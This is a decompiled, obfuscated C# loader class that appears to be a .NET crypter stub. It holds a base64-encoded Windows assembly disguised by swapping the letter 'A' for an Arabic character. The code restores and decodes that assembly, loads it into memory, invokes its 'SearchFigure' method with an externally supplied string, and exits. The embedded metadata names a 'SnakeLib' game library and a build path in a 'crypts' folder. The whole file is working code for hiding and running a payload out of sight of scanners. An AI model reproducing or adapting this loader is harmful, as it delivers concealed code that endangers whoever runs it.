using System;
using System.Reflection;

internal class Class9
{
	public Class9()
	{
		method_0();
	}

	public int method_0()
	{
		byte[] byte_ = smethod_0();
		Type type_ = Class9.smethod_4(Class9.smethod_3(byte_))[1];
		method_1(type_);
		Class9.smethod_5(0);
		return 0;
	}

	private void method_1(Type type_0)
	{
		_ = Class9.smethod_6(type_0)[1];
		Class9.smethod_7(type_0, "SearchFigure", BindingFlags.InvokeMethod, (Binder)null, (object)null, new object[2]
		{
			Class8.string_0,
			"KaranSnake"
		});
	}

	public static byte[] smethod_0()
	{
		string string_ = "TVqQخخMخخخخEخخخخ//8خخLgخخخخخخخخخQخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخgخخخخخ4fug4خtخnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJخخخخخخخخخBQRQخخTخEDخNGisl4خخخخخخخخخخOخخIiخLخTخخخCخخخخخGخخخخخخخخ1j4خخخخgخخخخQخخخخخخخEخخgخخخخخgخخBخخخخخخخخخخEخخخخخخخخخخCخخخخخخgخخخخخخخخMخQIUخخBخخخBخخخخخخEخخخEخخخخخخخخBخخخخخخخخخخخخخخخIQ+خخBPخخخخخEخخخJgDخخخخخخخخخخخخخخخخخخخخخخخخخGخخخخwخخخBMPQخخHخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخIخخخCخخخخخخخخخخخخخخخCCخخخEgخخخخخخخخخخخخخخC50ZXh0خخخخ3B4خخخخgخخخخIخخخخخIخخخخخخخخخخخخخخخخخخCخخخGخucnNyYwخخخJgDخخخخQخخخخخQخخخخiخخخخخخخخخخخخخخخخخخBخخخBخLnJlbG9jخخخMخخخخخGخخخخخCخخخخJgخخخخخخخخخخخخخخخخخخQخخخQgخخخخخخخخخخخخخخخخخخخخC4PgخخخخخخخEgخخخخCخخUخ8CkخخKQSخخخBخخخخخخخخخJQ8خخC4خخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخBMwBQBYخخخخخQخخEQخCjmkfENoX2hfWjR4خخخEKخh8QBhYGjmkoDgخخCgخGjmkX2gsWDCsaخخYIjx4خخخENCQlHخggfEF2RYdJSخخgX1gwIB/4CFv4BEwQRBC3ZBhMFKwخRBSoTMخUخvQخخخخIخخBEخcw8خخخoKخm8QخخخKF9oLFgw4iQخخخخخCbxEخخخoX2g0WEwQrZwخCCBEEbxIخخخoTBREFFhYWFigTخخخKKBQخخخoTBhEGLD4خBgZvFQخخChIFKBYخخخpvFwخخCgخGBm8VخخخKEgUoGخخخCm8XخخخKخخYGbxUخخخoSBSgZخخخKbxcخخخoخخخخRBBfWEwQRBخn+خhb+خRMHEQctiwخIF9YMCخf+خhb+خRMIEQg6Z////wZvGgخخChMJKwخRCSoخخخخTMخIخKخخخخخMخخBEخخ3IBخخBwKBsخخخooHخخخCnMdخخخKCgYCbx4خخخp0EgخخخQsrخخcqEzخDخDUخخخخEخخخRخخIDKخMخخخYoخgخخBigBخخخGCigfخخخKBm8gخخخKCwdvIQخخCgwIFowkخخخBFG8iخخخKDSoخخخخbMخEخPخخخخخUخخBEخخخJ7BgخخBG8jخخخKCisREgخoJخخخCgsخB28QخخخGخخخSخCglخخخKLebeDxIخ/hYDخخخbbyYخخخoخ3CoBEخخخخgخOخB4sخخ8خخخخخGzخCخD0خخخخFخخخRخخخCewYخخخRvIwخخCgorEhIخKCQخخخoLخخcDbxEخخخYخخBIخKCUخخخot5d4PEgD+FgMخخBtvJgخخCgDcKgخخخخEQخخخCخخ4خHy0خDwخخخخخiخignخخخKخCqmخnMoخخخKfQoخخخQCKCcخخخoخخخIDfQcخخخQCBH0IخخخEخgV9CQخخBCoخEzخEخD0خخخخGخخخRخخJ7CgخخBBgCewcخخخQYWW8pخخخKCgJ7CgخخBBgCewgخخخQYWW8pخخخKCwYHخnsJخخخEcw0خخخYMKwخIKgخخخBMwخwBخخخخخBwخخEQIoBwخخBgخخخnMqخخخKfQYخخخQDCisdخخYFDgRzDQخخBgsCewYخخخQHbysخخخoخخخYXWخoGBP4CFv4BDخgt2Cq2خignخخخKخخخCخ3sLخخخEfQsخخخQCخ3sMخخخEfQwخخخQCخ3sNخخخEfQ0خخخQqخخخTMخMخWgخخخخgخخBEخBBf+خQoGLخ4CخnsLخخخEخ1h9CwخخBخQW/gELBywOخgJ7CwخخBخNZfQsخخخQEGP4BDخgsDgICewwخخخQDWX0MخخخEBBn+خQ0JLخ4CخnsMخخخEخ1h9DخخخBCp6خignخخخKخخخCخ30LخخخEخgR9DخخخBخIFfQ0خخخQqegIoJwخخCgخخخgN9CwخخBخIEfQwخخخQCBX0OخخخEKkYخخh8gfQ0خخخQCKBخخخخYخKoIخخnsLخخخEخnsMخخخEKCwخخخoخخnsNخخخEKC0خخخoخKrYخخyguخخخKخخJ7CwخخBخJ7DخخخBCgsخخخKخخJ7DQخخBCgtخخخKخCgvخخخKخCoخخخخTMخMخخwEخخخkخخBEخH1خfGXMgخخخGCgZvIQخخBgخaGx8qcw0خخخYLBxsXcxcخخخYMCG8FخخخGخB9OHxcfJHMIخخخGDQlvCQخخBhMEEQRvEخخخBgخ4rQخخخخخIbxwخخخYtCخhvHQخخBisBFxMFEQUsHQخoMخخخCgByLQخخcCgxخخخKخCgyخخخKJjiخخخخخCBEEbxsخخخYTBhEGLDYخCW8JخخخGEwQrIwخIEQRvHgخخBhMHEQcsCwخRBG8QخخخGخCsOCW8JخخخGEwQخFxMIK9gخKwkخCG8YخخخGخخخfZCgzخخخKخCg0خخخKEwkRCSwXخCg1خخخKEwoIEgooNgخخCm8aخخخGخخخخFxMLOEv///8qXgIUfQ8خخخQCKDcخخخoخخخIoFgخخBgخqخBMwخgخrخخخخCgخخEQخDLخsCew8خخخQU/gMrخRYKBiwOخخJ7DwخخBG8mخخخKخخخCخyg4خخخKخCoخEzخDخFYخخخخخخخخخخخIoOQخخCgخCIgخخwEخiخخBQQXM6خخخKKDsخخخoخخhcoPخخخCgخCH3gWcz0خخخooPgخخCgخCckcخخHخoPwخخCgخCckcخخHBvQخخخCgخCFihBخخخKخCoخخBMwخwBPخخخخBwخخEQIoBwخخBgخخخgV9EخخخBخJzKgخخCn0GخخخEFgorKخخDcwsخخخYLBwYCexخخخخRvDخخخBgخCewYخخخQHbysخخخoخخخYXWخoGBP4EDخgt0CoخEzخDخDoخخخخLخخخRخBYWFnMNخخخGCgJ7BgخخBخZvQgخخCiYCKBkخخخYLخnsGخخخEB28rخخخKخخZvDwخخBgخHbxخخخخYخKgخخEzخDخCUخخخخMخخخRخBYWFnMNخخخGCgZzCwخخBgsHFwJ7EخخخBG8MخخخGخخcMKwخIKgخخخBMwخgBCخخخخCخخخEQخDHyX+خQoGLخcCFn0QخخخEخx8n/gELBywHخhd9EخخخBخMfJv4BDخgsBwIYfRخخخخQDHyj+خQ0JLخcCGX0QخخخEKgخخEzخDخFEخخخخNخخخRخBYWFnMNخخخGCgZ7CwخخBخN7CwخخBDMQBnsMخخخEخ3sMخخخE/gErخRYLByweخخMGew0خخخR9DQخخBخJ7BgخخBخNvKwخخCgخXDCsEFgwrخخgqخخخخEzخBخخgخخخخKخخخRخخخXCisخBioTMخMخJQخخخخ4خخBEخFgorBgخخBhdYCgYCewYخخخRvQwخخChhZ/gQLBy3mFgwrخخgqخخخخEzخDخGIخخخخPخخخRخBYKK0Mخخ3sLخخخEخnsGخخخEBm9EخخخKewsخخخQzGwN7DخخخBخJ7BgخخBخZvRخخخCnsMخخخE/gErخRYLBywEFgwrHQخGF1gKBgJ7BgخخBG9DخخخKF1n+Bخ0JLakXDCsخCCoخخBMwخwBخخخخخBwخخEQIoBwخخBgخخخnMqخخخKfQYخخخQDCisdخخUGDgRzDQخخBgsCewYخخخQHbysخخخoخخخYXWخoGBP4CFv4BDخgt2CoTMخQخiخخخخBخخخBECKCcخخخoخخخJzRQخخCn0RخخخEخwQoRgخخCgخWخxhZFh8rcwoخخخYKFgMYWQQXWR8rcwoخخخYLFgQXWRYfK3MfخخخGDBYEF1kDGFkfK3MfخخخGDQJ7EQخخBخZvRwخخCgخCexEخخخQHb0cخخخoخخnsRخخخECG9HخخخKخخJ7EQخخBخlvRwخخCgخqGzخCخD4خخخخRخخخRخخخCexEخخخRvSخخخCgorExIخKEkخخخoLخخcfDG8GخخخGخخخSخChKخخخKLeTeDxIخ/hYFخخخbbyYخخخoخ3CoخخخEQخخخCخخ4خIC4خDwخخخخBCU0pCخQخBخخخخخخخMخخخخdjIuMC41MDcyNwخخخخخFخGwخخخDcBwخخI34خخEgIخخDgBgخخI1N0cmluZ3MخخخخخKخ8خخFQخخخخjVVMخfخ8خخBخخخخخjR1VJRخخخخIwPخخخYخwخخI0Jsb2IخخخخخخخخخخgخخخVcdخggJخQخخخPoBMwخWخخخBخخخخLQخخخخsخخخخRخخخخIQخخخCYخخخBKخخخخBخخخخخ0خخخخRخخخخBQخخخخEخخخخEخخخخخQخخخخخخZخMBخخخخخخخGخCUC7خQGخJIC7خQGخHIBugQPخDMFخخخGخJoB0wMGخخgC0wMGخOkB0wMGخHkC0wMGخEUC0wMGخF4C0wMGخLEB0wMGخIYBzQQGخGQBzQQGخMwB0wMGخKkDkwMGخJcFkwMGخخQخdخخKخC4EخخMKخI4EخخMGخE0EDخUGخLwG0wMGخBQE0wNHخKkEخخخGخHwEkwMGخJ0DkwMGخB8EkwMOخKQDTQUSخF0EMwMGخKkGkwMGخLخCkwMGخEYEkwMGخIYGkwMKخMoخخخMGخO8CkwMGخLcDkwMGخخsخkwMGخEsB0wMGخO4خkwMGخPoخkwMGخI8خ3gIOخHoDTQUKخCخخخخMOخHEDTQUOخLwخTQUKخNkCخخMخخخخخEQخخخخخخخQخBخخخBخخDlخ9خخPQخBخخEخخخخQخEQB0خBBخخYخخQخخخBخخmgTQخEEخBwخIخخخخEخخeخdخخDخخLخخoخخخخQخBsG0خBBخخsخCwخخخBخخggPQخEEخDwخSخخEخEخBFخNخخbQخPخBQخخخخQخNخخ0خخMخBخخFwخخخBخخKwHQخخwخEQخfخخخخEخBHBdخخQQخRخCخخBgZLخOsBVoخ6خO4BVoخ/خO4BVoخxخO4BVoخsخO4BBخBBBvIBخQخZخ+sBخQDHBesBخQCuخ/oBخQCfخP0BBgCCBusBBgDbBusBBgCuخ/oBBgCzخخECخQB6BQQCخQDwخ+4BخQخ4BggCUCخخخخخخkQBBخRخCخQC0IخخخخخCRخPkFFwICخIخhخخخخخJYخngUeخgMخtCEخخخخخlgخ0خSUCBQD4IQخخخخDGخXwGBgخHخFخiخخخخخMYBfخYrخgcخrCIخخخخخhhi0BخYخCخC1IgخخخخCGGLQEMQIIخOخiخخخخخIYخowخ4خgsخLCMخخخخخhhi0BD0CCwB4IwخخخخCGGLQERQIPخKgjخخخخخIYخtQJLخhخخDiQخخخخخhhi0BDECEgخtJخخخخخCGGLQEUgIVخEwkخخخخخIYخQخQGخBgخXiQخخخخخhgB8BgYخGخB/JخخخخخCGخHwGKwIYخLخkخخخخخJEخsgNZخhkخrCIخخخخخhhi0BخYخGgC/JQخخخخCGGLQEBgخaخNglخخخخخMQخVgEVخBoخECYخخخخخgQDZBQYخGwB0JgخخخخCGGLQEXwIbخNخmخخخخخIMخtQIGخB4خGCcخخخخخhgخFBjgCHgBMJwخخخخCGخخwEaخIeخJwnخخخخخIMخiQVuخh8خ/CcخخخخخhgBXخ+EخIخخQKخخخخخCGخIwG4QخgخEQoخخخخخIYخhQVuخiخخtCgخخخخخhhi0BD0CIQخخKQخخخخCGGLQEZخElخJQpخخخخخIYخfخYGخCcخخخخBخخEخخخخBخFMخخخخBخJoDخخخCخIEGخخخBخEcGخخخCخHEخخخخBخJQEخخخBخBkDخخخCخMcFخخخDخK4DخخخBخLYFخخخCخNEFخخخDخNsGخخخEخK4DخخخBخD4EخخخBخK8FخخخCخPخDخخخBخIIGخخخCخNsGخخخDخK4DخخخBخIIGخخخCخNsGخخخDخLMخخخخBخJQEخخخBخEIFخخخBخPYCخخخBخFIDخخخCخCwDخخخDخO8DخخخBخLخGخخخBخK4خخخخBخD4EخخخBخDsEخخخCخCsGخخخDخIIGخخخEخK4DخخخBخBkDخخخCخCIDCQC0BخEخEQC0BخYخGQC0BخoخKQC0BBخخMQC0BBخخOQC0BBخخQQC0BBخخSQC0BBخخUQC0BBخخWQC0BBخخYQC0BBUخaQC0BBخخcQC0BBخخ+QDFBiYخDخC0BخYخCQEPخ0wخCQG8BUwخkQBJخ1خخmQBWخFcخmQDPBmخخDخخhBkwخmQخ0خGgخDخخxBmwخmQخmخGgخmQخaخGgخDخCEBnMخEQGNBYخخqQC0BoYخoQC0BIsخoQCUBZIخGQHBخ6EخGQGWخKcخqQخSBq4خKQHWخLMخFخCmBMwخHخDtBdwخHخBqBuEخMQFWخQYخgQC0BخYخyQC0BخYخyQBuBuwخFخC0BخYخFخCbخPkخOQH6خwYBOQFeخQwBOQFoBBEBOQGJBBcBOQFخBBcBOQEUخTخBOQELخTUBQQE1BDkBOQHdخD4BOQGhBkIB0QCZBkcB2QC0BخYخ2QBWخRUخSQFPBgYخUQG0BFخBWQFiBVYBWQG4خF0BaQG0BGQB2QDBخmoBSQECخRخخSQFzBhخخSQFdBhUخFخC6خngBFخخhBkwخFخCKخ5sBJخC0BخYخOQHQخgYBJخCbخPkخJخCmBMwخLخDtBdwخLخBqBuEخCخخIخNcBCخخMخNwBCخخQخOEBCخخUخOYBLgخLخHQCLgخTخH0CLgخbخJwCLgخjخKUCLgخrخLMCLgخzخLMCLgخ7خLMCLgBDخKUCLgBLخLkCLgBTخLMCLgBbخLMCLgBjخOECLgBrخخsDGgخzخHkخlwC6خOUخ8gD/خBsBTخFxخX4BhwGOخZQBoQGzخUYخxQDVخKwBvgEEgخخخBخخFخخIخخخخخخخخخخخBfخخخخخgخخخخخخخخخخخخخخxQFoخخخخخخخCخخخخخخخخخخخخخخDOخQخDخخخخخخIخخخخخخخخخخخخخخMUBTQUخخخخخخgخخخخخخخخخخخخخخxQGTخwخخخخخخخخخخخQخخخB0FخخخخخخBwMخBMaXN0YDEخSW50MzIخPE1vZHVsZT4خZ2V0X0IخU2l6ZUYخZ2V0X0cخRE9XTgBVUخBnZXRfUgBMRUZUخFJJR0hUخFNJR0RVخHZhbHVlX18خYWEخRnJvbUFyZ2IخU25ha2VMaWIخbXNjb3JsaWIخY2MخU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMخVGhyZWFkخExvYWQخQWRkخHJuZخBDcmVhdGVGb29kخGZvb2Qخd29yZخBzZXRfQXV0b1NjYWxlTW9kZQBJbWFnZQBTbmFrZQBJbnZva2UخZ2V0X0tleUF2YWlsYWJsZQBJRGlzcG9zYWJsZQBDb25zb2xlخHNldF9OYW1lخFJlYWRMaW5lخFdyaXRlTGluZQBIb3Jpem9udExpbmUخVmVydExpbmUخU2VhcmNoRmlndXJlخEN1dEZpZ3VyZQBNZXRob2RCYXNlخERpc3Bvc2UخV3JpdGUخR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlخENvbVZpc2libGVBdHRyaWJ1dGUخQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlخEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlخENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUخQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlخEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlخEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBCeXRlخE1vdmUخUmVtb3ZlخHNldF9DbGllbnRTaXplخFNldFdpbmRvd1NpemUخU3lzdGVtLlRocmVhZGluZwBTdHJpbmcخZGlzcG9zaW5nخFN5c3RlbS5EcmF3aW5nخGdldF9XaWR0aخBtYXBXaWR0aخBtYXBIZWlndGgخbGVuZ3RoخFN5c3RlbS5Db21wb25lbnRNb2RlbخBHZXRQaXhlbخB0YWlsخGNyb3NzaW5nV2FsbخBTbmFrZUxpYi5kbGwخQ29udGFpbmVyQ29udHJvbخBQcm9ncmFtخGdldF9JdGVtخFN5c3RlbQBtbQBSYW5kb20خRm9ybQBFbnVtخHN5bQBNYWluخEFwcERvbWFpbgBnZXRfQ3VycmVudERvbWFpbgBTeXN0ZW0uUmVmbGVjdGlvbgBEaXJlY3Rpb24خX2RpcmVjdGlvbgBTZXRDdXJzb3JQb3NpdGlvbgBpTW92ZVRvخE1ldGhvZEluZm8خQ29uc29sZUtleUluZm8خQml0bWFwخFNsZWVwخHlUb3خخQ2xlYXIخQnVmZmVyخFJlc291cmNlTWFuYWdlcgBJQ29udGFpbmVyخHNldF9Gb3JlZ3JvdW5kQ29sb3IخQ29uc29sZUNvbG9yخFJlc2V0Q29sb3IخY29sb3IخRm9vZENyZWF0b3IخR2V0RW51bWVyYXRvcgخuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MخU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzخFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMخU3lzdGVtLlJlc291cmNlcwBTbmFrZS5TSUdEVS5yZXNvdXJjZXMخRGVidWdnaW5nTW9kZXMخYXJncwBXYWxscwBTeXN0ZW0uV2luZG93cy5Gb3JtcwBzZXRfQXV0b1NjYWxlRGltZW5zaW9ucwBjb21wb25lbnRzخGdvb2RFYXQخQ29uY2F0خEdldE9iamVjdخBDb3JlQXR0cmlidXRlU2V0خG9mZnNldخB4TGVmdخBnZXRfSGVpZ2h0خG1hcEhlaWdodخB4UmVpZ2h0خEluaXRpYWxpemVDb21wb25lbnQخZ2V0X0N1cnJlbnQخRmlndXJlUG9pbnQخZ2V0TmV4dFBvaW50خGdldF9FbnRyeVBvaW50خGdldF9Db3VudخB5Rm9vdخBJbnNlcnQخd2FsbExpc3QخcExpc3QخQ29yZUF0dخBTdXNwZW5kTGF5b3V0خFJlc3VtZUxheW91dخBNb3ZlTmV4dخBzZXRfVGV4dخBEcmF3خHh4خFRvQXJyYXkخY3Jvc3NpbmdCb2R5خGdldF9LZXkخUmVhZEtleQBDb25zb2xlS2V5خEdldEVudHJ5QXNzZW1ibHkخQmxvY2tDb3B5خG9wX0luZXF1YWxpdHkخخخخخخCsuخFخخcgBvخHخخZQByخHQخaQBlخHMخLgBSخGUخcwBvخHUخcgBjخGUخcwخخGSIESwQgخD8EQخQ+BDgEMwRخBDخEOwQhخخELUwBJخEcخRخBVخخخخw6t5f2y5S0SoITyWHga0sQخEIخEBCخMgخخEFIخEBEREEIخEBDgQgخQECCwcGHQUICBخFخh0FDخخFخRKخgQgSgIEICBIHChUSRQEFCخgICBFNخgICHQUFFRJFخQUDIخخIBiخCEU0ICخgخBBFNCخgICخcخخgIRTRFNخyخخBQYgخgEIEwخFIخخdEwخGBwISURJJBQخCDg4OBخخخElUGIخIBDhJVBCخBHخ4JBwQdBRJVElkcBQخخEoCNBiخBElUdBQQgخBJZBiخCHBwdHخoHخhURXQESGBIYBhUSRQESGخggخBURXQETخخYVEV0BEhgEIخخTخخMgخخIGBwMICBIYBSخCCخgIBgcDCBIYخgUgخQETخخYHBخICخgIFخخIBCخgEخخEBخwUخخQERYQMخخخEUBwwSLBIYEiQSEBIYخgICخgIRaQIEخخEBDgMخخخ4EخخEBCخMخخخIEخخخRaQQgخBF1خwcBخgUgخgEMDخYgخQERgKkGIخEBEYCxBSخCخQgIBiخBخRGخtQYHخhIYEhgFIخECEwخIBwMSGBIYEhgGBwMSGخICBQcDCخICBgcECخICخgUgخRMخCخoHBBIUEhQSKBIoBhUSRQESDخoHخhURXQESDBIMBhURXQESDخi3elxWGTTgiQiwP19/EdUKOgQخخخخخBخEخخخخEخgخخخخQDخخخخخgYIخwYRCخcGFRJFخRIYخgYDخwYSZQIGDgMGEnEHBhUSRQESDخYخخR0FHQUGخخEdBRJJBgخCEkkODgUخخgEODgUgخQERYQYgخwEICخMEIخخSGخcgBخEICخgDBSخBخRIYBiخCخQgRCخYgخwEICخ4FخخEBHQ4IIخMBEhgIEQgFIخEBEXUFIخECEhgIخQخIخخخخخخخeخQخBخFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCخEخBwEخخخخخDQEخCFNuYWtlTGliخخخFخQخخخخخnخQخiU25ha2VMaWIgQ29weXJpZ2h0IMKpICخyMDE1IC0gMjخyMخخخKQEخJDخzNkRCQzNGLUQ5OUYtNDBGMi1CQjk5LTZBREMwMURDMEQ4RQخخDخEخBzQuNS4yLjخخخLQخخخDOyu++خQخخخJEخخخBsU3lzdGVtLlJlc291cmNlcy5SZXNvdXJjZVJlYWRlciwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjخuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5I1N5c3RlbS5SZXNvdXJjZXMuUnVudGltZVJlc291cmNlU2V0خgخخخخخخخخخخخخخخUEFEUEFEULQخخخخخخخخخ0aKyXgخخخخخCخخخخHخEخخGg9خخBoHwخخUlNEU49/LBg/yi1GnXtxaQxzKi4BخخخخQzpcVXNlcnNcVmVuZGV0dGFcRGVza3RvcFxjcnlwdHNcU25ha2VDc2hhcnخtbWFzdGVyXFNuYWtlXG9ialxEZWJ1Z1xTbmFrZUxpYi5wZGIخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخCsPgخخخخخخخخخخخخDGPgخخخCخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخuD4خخخخخخخخخخخخخخخBfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbخخخخخخخ/yUخIخخQخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخQخQخخخخGخخخgخخخخخخخخخخخخخخخخخخخخQخBخخخخMخخخgخخخخخخخخخخخخخخخخخخخخQخخخخخخSخخخخFhخخخخ8خwخخخخخخخخخخخخخ8خzQخخخBWخFMخXwBWخEUخUgBTخEkخTwBOخF8خSQBOخEYخTwخخخخخخvQTv/gخخخQخFخخQخخخخCخخUخBخخخخخIخPwخخخخخخخخخEخخخخخgخخخخخخخخخخخخخخخخخخخEQخخخخBخFYخYQByخEYخaQBsخGUخSQBuخGYخbwخخخخخخJخخEخخخخVخByخGEخbgBzخGwخYQB0خGkخbwBuخخخخخخخخخLخEnخIخخخEخUwB0خHIخaQBuخGcخRgBpخGwخZQBJخG4خZgBvخخخخeخIخخخEخMخخwخDخخMخخwخDQخYgخwخخخخGgخBخخEخQwBvخG0خbQBlخG4خdخBzخخخخخخخخخCIخخQخBخEMخbwBtخHخخYQBuخHkخTgBhخG0خZQخخخخخخخخخخخDoخCQخBخEYخaQBsخGUخRخBlخHMخYwByخGkخcخB0خGkخbwBuخخخخخخBTخG4خYQBrخGUخTخBpخGIخخخخخخDخخCخخBخEYخaQBsخGUخVgBlخHIخcwBpخG8خbgخخخخخخNخخuخDUخLgخyخC4خMخخخخDoخDQخBخEkخbgB0خGUخcgBuخGEخbخBOخGEخbQBlخخخخUwBuخGEخawBlخEwخaQBiخC4خZخBsخGwخخخخخخGgخIgخBخEwخZQBnخGEخbخBDخG8خcخB5خHIخaQBnخGgخdخخخخFMخbgBhخGsخZQBMخGkخYgخgخEMخbwBwخHkخcgBpخGcخaخB0خCخخqQخgخCخخMgخwخDEخNQخgخC0خIخخyخDخخMgخwخخخخKgخBخخEخTخBlخGcخYQBsخFQخcgBhخGQخZQBtخGEخcgBrخHMخخخخخخخخخخخBCخخ0خخQBPخHIخaQBnخGkخbgBhخGwخRgBpخGwخZQBuخGEخbQBlخخخخUwBuخGEخawBlخEwخaQBiخC4خZخBsخGwخخخخخخDIخCQخBخFخخcgBvخGQخdQBjخHQخTgBhخG0خZQخخخخخخUwBuخGEخawBlخEwخaQBiخخخخخخخ0خخgخخQBQخHIخbwBkخHUخYwB0خFYخZQByخHMخaQBvخG4خخخخ0خC4خNQخuخDIخLgخwخخخخOخخIخخEخQQBzخHMخZQBtخGIخbخB5خCخخVgBlخHIخcwBpخG8خbgخخخDQخLgخ1خC4خMgخuخDخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخMخخخDخخخخNg+خخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخ==";
		GClass1 gClass = new GClass1(smethod_2(smethod_1(string_)));
		return gClass.method_0();
	}

	private static string smethod_1(string string_0)
	{
		return Class9.smethod_8(string_0, "خ", "A");
	}

	private static char[] smethod_2(string string_0)
	{
		char[] array = new char[Class9.smethod_9(string_0)];
		for (int i = 0; i < Class9.smethod_9(string_0); i++)
		{
			array[i] = Class9.smethod_10(string_0, i);
		}
		return array;
	}

	static Assembly smethod_3(byte[] byte_0)
	{
		return Assembly.Load(byte_0);
	}

	static Type[] smethod_4(Assembly assembly_0)
	{
		return assembly_0.GetTypes();
	}

	static void smethod_5(int int_0)
	{
		Environment.Exit(int_0);
	}

	static MethodInfo[] smethod_6(Type type_0)
	{
		return type_0.GetMethods();
	}

	static object smethod_7(Type type_0, string string_0, BindingFlags bindingFlags_0, Binder binder_0, object object_0, object[] object_1)
	{
		return type_0.InvokeMember(string_0, bindingFlags_0, binder_0, object_0, object_1);
	}

	static string smethod_8(string string_0, string string_1, string string_2)
	{
		return string_0.Replace(string_1, string_2);
	}

	static int smethod_9(string string_0)
	{
		return string_0.Length;
	}

	static char smethod_10(string string_0, int int_0)
	{
		return string_0[int_0];
	}
}
